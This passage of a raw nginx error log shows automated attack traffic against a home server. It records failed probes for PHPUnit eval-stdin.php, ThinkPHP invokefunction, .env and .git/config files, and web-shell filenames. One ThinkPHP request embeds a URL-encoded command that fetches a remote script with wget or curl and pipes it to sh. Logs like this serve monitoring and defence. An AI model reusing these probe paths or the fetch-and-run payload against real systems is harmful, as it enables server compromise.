(2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:17 [error] 367#367: *74301 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:17 [error] 367#367: *74301 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:17 [error] 367#367: *74301 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:17 [error] 367#367: *74301 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:17 [error] 367#367: *74301 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:18 [error] 367#367: *74301 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:18 [error] 367#367: *74301 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:18 [error] 367#367: *74301 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:18 [error] 367#367: *74301 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:18 [error] 367#367: *74301 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:18 [error] 367#367: *74301 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:18 [error] 367#367: *74301 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:18 [error] 367#367: *74301 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:19 [error] 367#367: *74301 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:19 [error] 367#367: *74301 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:19 [error] 367#367: *74301 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:19 [error] 367#367: *74301 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:19 [error] 367#367: *74301 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:19 [error] 367#367: *74301 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:19 [error] 367#367: *74301 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:19 [error] 367#367: *74301 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 22:02:30 [error] 367#367: *74304 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 23:50:51 [error] 374#374: *74358 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 102.22.20.125, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "91.82.215.191" +2026/01/25 00:01:50 [error] 374#374: *74362 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 00:47:10 [error] 375#375: *74394 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 00:48:42 [error] 375#375: *74395 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 01:36:00 [error] 376#376: *74427 "/var/www/html/backup/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /backup/ HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 02:08:22 [error] 376#376: *74477 open() "/var/www/html/.env" failed (2: No such file or directory), client: 68.183.15.210, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/25 02:08:22 [error] 376#376: *74478 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 68.183.15.210, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/25 02:12:53 [error] 376#376: *74481 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 64.62.197.62, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "91.82.215.191" +2026/01/25 02:15:42 [error] 375#375: *75971 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 64.62.197.62, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "91.82.215.191" +2026/01/25 02:18:31 [error] 375#375: *75975 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 02:47:37 [error] 376#376: *75986 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 74.249.178.154, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "91.82.215.191" +2026/01/25 03:41:30 [error] 376#376: *76034 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 03:50:58 [error] 377#377: *76037 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 04:59:31 [error] 381#381: *76070 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191" +2026/01/25 04:59:31 [error] 381#381: *76071 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f7182e4%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f7182e4%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f7182e4%29%7Csh HTTP/1.1", host: "91.82.215.191" +2026/01/25 04:59:31 [error] 381#381: *76072 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /index.php?s=captcha HTTP/1.1", host: "91.82.215.191" +2026/01/25 05:17:37 [error] 381#381: *76079 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 05:23:37 [error] 382#382: *76082 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 06:47:14 [error] 382#382: *77606 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 06:57:30 [error] 382#382: *77612 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 07:19:22 [error] 382#382: *77617 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 07:19:55 [error] 382#382: *77618 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 07:26:19 [error] 382#382: *77620 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 07:44:20 [error] 383#383: *77625 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 07:59:37 [error] 383#383: *77630 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 08:32:07 [error] 382#382: *79130 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 08:36:08 [error] 384#384: *80628 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 101.199.254.208, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 08:36:10 [error] 384#384: *80629 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 101.199.254.201, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 08:36:13 [error] 384#384: *80630 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 101.199.254.198, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 08:51:18 [error] 384#384: *80635 open() "/var/www/html/.env" failed (2: No such file or directory), client: 77.83.39.218, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/25 08:55:11 [error] 384#384: *82135 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 101.91.110.23, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 08:55:14 [error] 384#384: *82136 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 101.91.110.164, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 08:55:18 [error] 384#384: *82137 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 101.91.110.151, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 08:58:42 [error] 384#384: *82143 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 09:18:23 [error] 384#384: *82150 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 09:27:46 [error] 383#383: *83644 open() "/var/www/html/security.txt" failed (2: No such file or directory), client: 167.94.146.63, server: localhost-nginx-proxy-manager, request: "GET /security.txt HTTP/1.1", host: "91.82.215.191" +2026/01/25 10:06:23 [error] 382#382: *85159 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 10:53:28 [error] 388#388: *85189 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 11:02:37 [error] 388#388: *85210 open() "/var/www/html/WuEL" failed (2: No such file or directory), client: 185.91.69.5, server: localhost-nginx-proxy-manager, request: "GET /WuEL HTTP/1.1", host: "91.82.215.191" +2026/01/25 11:02:41 [error] 389#389: *85212 open() "/var/www/html/a" failed (2: No such file or directory), client: 185.91.69.5, server: localhost-nginx-proxy-manager, request: "GET /a HTTP/1.1", host: "91.82.215.191" +2026/01/25 11:02:43 [error] 389#389: *85213 open() "/var/www/html/download/file.ext" failed (2: No such file or directory), client: 185.91.69.5, server: localhost-nginx-proxy-manager, request: "GET /download/file.ext HTTP/1.1", host: "91.82.215.191" +2026/01/25 11:02:45 [error] 389#389: *85214 open() "/var/www/html/SiteLoader" failed (2: No such file or directory), client: 185.91.69.5, server: localhost-nginx-proxy-manager, request: "GET /SiteLoader HTTP/1.1", host: "91.82.215.191" +2026/01/25 11:02:47 [error] 389#389: *85215 open() "/var/www/html/mPlayer" failed (2: No such file or directory), client: 185.91.69.5, server: localhost-nginx-proxy-manager, request: "GET /mPlayer HTTP/1.1", host: "91.82.215.191" +2026/01/25 11:15:06 [error] 389#389: *85222 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 77.83.39.218, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/25 11:22:10 [error] 389#389: *85228 open() "/var/www/html/GponForm/diag_Form" failed (2: No such file or directory), client: 45.230.66.118, server: localhost-nginx-proxy-manager, request: "POST /GponForm/diag_Form?images/ HTTP/1.1", host: "127.0.0.1:80" +2026/01/25 12:20:40 [error] 388#388: *86735 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.139.104.168, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/25 12:27:34 [error] 389#389: *86737 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 13:00:38 [error] 389#389: *86755 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 13:15:38 [error] 209#209: *8 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 13:35:48 [error] 210#210: *11 open() "/var/www/html/druid/index.html" failed (2: No such file or directory), client: 40.67.177.206, server: localhost-nginx-proxy-manager, request: "GET /druid/index.html HTTP/1.1", host: "91.82.215.191" +2026/01/25 14:03:17 [error] 209#209: *6 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 15:39:22 [error] 208#208: *1541 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 165.154.226.238, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 15:39:36 [error] 210#210: *1544 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 15:55:51 [error] 207#207: *1 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 16:26:26 [error] 207#207: *8 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 16:55:18 [error] 209#209: *1506 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 167.94.138.183, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "91.82.215.191" +2026/01/25 17:50:40 [error] 209#209: *3038 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 18:12:58 [error] 209#209: *3062 open() "/var/www/html/ReportServer" failed (2: No such file or directory), client: 13.89.125.20, server: localhost-nginx-proxy-manager, request: "GET /ReportServer HTTP/1.1", host: "91.82.215.191" +2026/01/25 18:19:03 [error] 209#209: *3067 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:03 [error] 209#209: *3067 open() "/var/www/html/rrr.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /rrr.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:03 [error] 209#209: *3067 open() "/var/www/html/kk.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /kk.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:04 [error] 209#209: *3067 open() "/var/www/html/as.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /as.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:04 [error] 209#209: *3067 open() "/var/www/html/bless.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /bless.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:04 [error] 209#209: *3067 open() "/var/www/html/style.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /style.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:04 [error] 209#209: *3067 open() "/var/www/html/cwclass.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /cwclass.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:05 [error] 209#209: *3067 open() "/var/www/html/goods.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET //goods.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:05 [error] 209#209: *3067 open() "/var/www/html/0x.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /0x.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:05 [error] 209#209: *3067 open() "/var/www/html/wp-admin/js/about.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:05 [error] 209#209: *3067 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /404.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:06 [error] 209#209: *3067 open() "/var/www/html/goomaogm.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /goomaogm.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:06 [error] 209#209: *3067 open() "/var/www/html/Dede.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /Dede.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:06 [error] 209#209: *3067 open() "/var/www/html/dichku.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /dichku.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:06 [error] 209#209: *3067 open() "/var/www/html/h2a2ck.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /h2a2ck.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:06 [error] 209#209: *3067 open() "/var/www/html/yr.PHP" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /yr.PHP HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:07 [error] 209#209: *3067 open() "/var/www/html/Mks3.PhP" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /Mks3.PhP HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:07 [error] 209#209: *3067 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:08 [error] 209#209: *3067 open() "/var/www/html/ty226.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ty226.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:08 [error] 209#209: *3067 open() "/var/www/html/webadmin.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /webadmin.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:08 [error] 209#209: *3067 open() "/var/www/html/pn.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /pn.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:09 [error] 209#209: *3067 open() "/var/www/html/classwithtostring.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /classwithtostring.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:09 [error] 209#209: *3067 open() "/var/www/html/img.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /img.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:09 [error] 209#209: *3067 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:09 [error] 209#209: *3067 open() "/var/www/html/hans.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /hans.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:10 [error] 209#209: *3067 open() "/var/www/html/wp-admin/js/index.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/index.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:10 [error] 209#209: *3067 open() "/var/www/html/wp-ana.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-ana.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:10 [error] 209#209: *3067 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:10 [error] 209#209: *3067 open() "/var/www/html/tx1.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /tx1.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:11 [error] 209#209: *3067 open() "/var/www/html/lv.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /lv.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:11 [error] 209#209: *3067 open() "/var/www/html/ccou.php" failed (2: No such file or directory), client: 4.217.220.52, server: 